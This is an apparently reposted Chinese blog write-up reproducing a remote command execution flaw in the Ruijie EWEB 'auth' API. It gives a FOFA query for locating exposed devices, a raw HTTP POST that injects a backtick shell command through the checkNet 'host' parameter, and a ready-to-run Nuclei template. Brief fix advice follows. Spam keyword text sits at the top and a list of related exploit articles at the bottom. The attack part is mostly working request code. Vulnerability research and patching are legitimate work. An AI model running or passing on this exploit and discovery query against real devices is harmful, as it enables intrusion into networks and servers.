国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞

這篇具有很好參考價(jià)值的文章主要介紹了【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

免責(zé)聲明:文章來(lái)源互聯(lián)網(wǎng)收集整理,請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。

?? ? 【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),web安全? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),web安全??? ? ? ? ? ? ? ? ?

Ⅰ、漏洞描述

銳捷睿易是銳捷網(wǎng)絡(luò)針對(duì)商業(yè)市場(chǎng)的子品牌。擁有易網(wǎng)絡(luò)、交換機(jī)、路由器、無(wú)線、安全、云服務(wù)六大產(chǎn)品線,解決方案涵蓋商貿(mào)零售、酒店、KTV、網(wǎng)吧、監(jiān)控安防、物流倉(cāng)儲(chǔ)、制造業(yè)、中小教育、中小醫(yī)療、中小政府等商業(yè)用戶。

auth接口存在RCE漏洞,惡意攻擊者可能會(huì)利用該漏洞執(zhí)行惡意命令,進(jìn)而導(dǎo)致服務(wù)器失陷。

【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),web安全

Ⅱ、fofa語(yǔ)句

body="cgi-bin/luci" && body="#f47f3e"

Ⅲ、漏洞復(fù)現(xiàn)

POC

POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

{"method":"checkNet","params":{"host":"`echo Hello World!>test.txt`"}}

1、構(gòu)建poc

【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),web安全

2、訪問(wèn)上傳文件

http://127.0.0.1/cgi-bin/test.txt

【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞,漏洞復(fù)現(xiàn),web安全

Ⅳ、Nuclei-POC

id: Ruijie-EWEB-auth-REC

info:
  name: auth接口存在RCE漏洞,惡意攻擊者可能會(huì)利用該漏洞執(zhí)行惡意命令,進(jìn)而導(dǎo)致服務(wù)器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="cgi-bin/luci" && body="#f47f3e"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /cgi-bin/luci/api/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        {"method":"checkNet","params":{"host":"`echo Hello World!>{{filename}}.txt`"}}


      - |
        GET /cgi-bin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修復(fù)建議

1、請(qǐng)聯(lián)系廠商進(jìn)行修復(fù)或升級(jí)到安全版本;

2、如非必要,禁止公網(wǎng)訪問(wèn)該系統(tǒng);

3、設(shè)置白名單訪問(wèn)。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-838805.html

到了這里,關(guān)于【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 思福迪Logbase運(yùn)維安全管理系統(tǒng)test_qrcode_b接口遠(yuǎn)程命令執(zhí)行漏洞漏洞復(fù)現(xiàn) [附POC]

    免責(zé)聲明:請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章

    2024年01月17日
    瀏覽(27)
  • 銳捷 NBR路由器 遠(yuǎn)程命令執(zhí)行漏洞(CNVD-2021-09650)

    銳捷 NBR路由器 遠(yuǎn)程命令執(zhí)行漏洞(CNVD-2021-09650)

    i ? 銳捷NBR路由器 EWEB網(wǎng)管系統(tǒng)部分接口存在命令注入,導(dǎo)致遠(yuǎn)程命令執(zhí)行獲取權(quán)限 s ? 銳捷NBR路由器 EWEB網(wǎng)管系統(tǒng) d ? FOFA:title=\\\"銳捷網(wǎng)絡(luò)-EWEB網(wǎng)管系統(tǒng)\\\" ? FOFA:icon_hash=\\\"-692947551\\\" ?訪問(wèn)首頁(yè) ?執(zhí)行Payload命令 然后訪問(wèn)頁(yè)面 /guest_auth/test.txt 就可以看到命令執(zhí)行的結(jié)果

    2024年02月15日
    瀏覽(28)
  • 漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    漏洞復(fù)現(xiàn) - - -Struts2(s2-045)遠(yuǎn)程命令執(zhí)行漏洞

    Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2作為控制器(Controller)來(lái)建立模型與視圖的數(shù)據(jù)交互。Struts 2是Struts的下一代產(chǎn)品,是在 struts 1和WebWork的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2框架。其全新的Struts 2的體系結(jié)構(gòu)與St

    2024年01月20日
    瀏覽(31)
  • 漏洞復(fù)現(xiàn)-nginxWebUI runCmd前臺(tái)遠(yuǎn)程命令執(zhí)行漏洞(附漏洞檢測(cè)腳本)

    漏洞復(fù)現(xiàn)-nginxWebUI runCmd前臺(tái)遠(yuǎn)程命令執(zhí)行漏洞(附漏洞檢測(cè)腳本)

    文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗(yàn)分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)

    2024年04月17日
    瀏覽(28)
  • CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過(guò)程 1.測(cè)試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱 GITLAB 遠(yuǎn)程命令執(zhí)行漏洞 漏洞編號(hào) CVE-2021-22205 危害等級(jí) 高危 CVSS評(píng)分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(25)
  • xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    XXL-JOB是一個(gè)分布式任務(wù)調(diào)度平臺(tái),其核心設(shè)計(jì)目標(biāo)是開發(fā)迅速、學(xué)習(xí)簡(jiǎn)單、輕量級(jí)、易擴(kuò)展。現(xiàn)已開放源代碼并接入多家公司線上產(chǎn)品線,開箱即用。XXL-JOB分為admin和executor兩端,前者為后臺(tái)管理頁(yè)面,后者是任務(wù)執(zhí)行的客戶端。executor默認(rèn)沒(méi)有配置認(rèn)證,未授權(quán)的攻擊者可

    2024年02月11日
    瀏覽(16)
  • 【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    廈門才茂通信網(wǎng)關(guān)formping存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可通過(guò)特定payload對(duì)目標(biāo)服務(wù)器發(fā)起攻擊,造成不可估量的影響。 請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所

    2024年02月15日
    瀏覽(44)
  • HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    最近HVV爆出的很火的WPS命令執(zhí)行漏洞,其實(shí)并不是0DAY,早在2019年就出現(xiàn)了,只不過(guò)最近EXP才公開。接下來(lái)我們來(lái)復(fù)現(xiàn)一遍。 WPS Office 2023 個(gè)人版 11.1.0.15120 WPS Office 2019 企業(yè)版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶機(jī): windows 10 攻擊機(jī): ubuntu 20.04 ????IP:192.168.2.103 WPS 內(nèi)置了一

    2024年02月11日
    瀏覽(22)
  • Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    一、漏洞說(shuō)明 Spring Data是一個(gè)用于簡(jiǎn)化數(shù)據(jù)庫(kù)訪問(wèn),并支持云服務(wù)的開源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模塊。此漏洞產(chǎn)生于Spring Data Commons組件,該組件為提供共享的基礎(chǔ)框架,適合各個(gè)子項(xiàng)目使用,支持跨數(shù)據(jù)庫(kù)持久化。 Spring Data Commons組件中存在遠(yuǎn)程代碼執(zhí)行

    2024年02月09日
    瀏覽(21)
  • 【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 IP-guard Webserver遠(yuǎn)程命令執(zhí)行漏洞(RCE)的問(wèn)題,是因?yàn)榕f版本申請(qǐng)審批的文件預(yù)覽功能用到了一個(gè)開源的插件 flexpaper,使用的這個(gè)

    2024年02月05日
    瀏覽(31)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包